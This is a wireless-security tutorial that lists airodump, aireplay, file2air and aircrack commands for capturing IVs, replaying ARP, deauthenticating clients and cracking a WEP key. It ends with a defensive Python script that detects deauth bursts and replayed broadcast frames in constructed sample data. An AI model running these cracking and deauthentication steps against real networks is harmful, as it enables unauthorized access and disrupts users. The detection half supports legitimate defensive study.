The first thing you need to do is run airodump to capture the necessary IVs.

usage: airodump ath0 <file prefix> <channel> 1

e.g.

#airodump ath0 capture 9 1

Do NOT close airodump; open a new shell and start aireplay:

usage: aireplay -3 -b <Networks BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff ath0

If you are unable to capture an ARP packet, you can disassociate the client to force it to ARP. You can do this using file2air or aireplay: open a third shell and start file2air/aireplay with the following parameters:

#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0

or

#file2air -i ath0 -r madwifi -n 8000 -d <client MAC address> -s <APs MAC address> -b <Networks BSSID> -f /KNOPPIX/files/deauth.bin

NOTE: THIS CAN CAUSE THE KERNEL TO CRASH

If this fails to produce an ARP, you will have to try one or more of the following:

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 8000
Try a different .bin file, such as beacon.bin

You will need to capture approximately 1 million IVs to crack a 128-bit WEP key. When you have done this, run aircrack:

#aircrack capture.ivs

NOTE: It is possible to run aircrack in parallel with airodump, but in practice I have found that this will not always crack the WEP key; once airodump has been stopped, the WEP key is usually found in a matter of seconds.
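The two techniques above leave a distinctive footprint in a wireless capture: a burst of deauthentication frames aimed at one client, followed by the same 68-byte broadcast data frame replayed thousands of times from the client's MAC. The following script is an added example (not part of this page or of the aircrack tools) showing how a wireless IDS could flag both patterns; the frame summaries and MAC addresses it processes are constructed, and the thresholds are assumptions you would tune for your environment.

```python
from collections import Counter, defaultdict

# Constructed MAC addresses for the sample (not real devices)
AP = "00:11:22:33:44:55"
CLIENT = "aa:bb:cc:dd:ee:ff"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Assumed detection thresholds; tune for the monitored network
DEAUTH_THRESHOLD = 5     # deauth frames from one source inside the window
REPLAY_THRESHOLD = 50    # identical broadcast data frames from one source
WINDOW_S = 10.0          # sliding window for the deauth burst check


def _build_sample():
    """Constructed frame summaries: (timestamp_s, frame_type, src, dst, length)."""
    frames = []
    # Benign background traffic: a few ordinary client-to-AP data frames
    for i in range(5):
        frames.append((i * 1.0, "data", CLIENT, AP, 120 + i))
    # Deauth burst: 8 deauth frames from the AP's address to the client in 2 s
    for i in range(8):
        frames.append((5.0 + i * 0.25, "deauth", AP, CLIENT, 26))
    # Replayed ARP: 60 copies of one 68-byte broadcast data frame in 3 s
    for i in range(60):
        frames.append((10.0 + i * 0.05, "data", CLIENT, BROADCAST, 68))
    return frames


SAMPLE_FRAMES = _build_sample()


def find_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_S):
    """Return source MACs that sent >= threshold deauth frames within any window."""
    by_src = defaultdict(list)
    for ts, ftype, src, _dst, _length in frames:
        if ftype == "deauth":
            by_src[src].append(ts)
    flagged = set()
    for src, times in by_src.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:   # slide the window start forward
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.add(src)
                break
    return flagged


def find_broadcast_replays(frames, threshold=REPLAY_THRESHOLD):
    """Return (src, length) pairs of broadcast data frames seen >= threshold times."""
    counts = Counter((src, length) for _ts, ftype, src, dst, length in frames
                     if ftype == "data" and dst == BROADCAST)
    return {key for key, n in counts.items() if n >= threshold}
```

On the constructed sample, find_deauth_bursts flags the AP address and find_broadcast_replays flags the client's repeated 68-byte broadcast frame, while the ordinary client-to-AP traffic is ignored.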
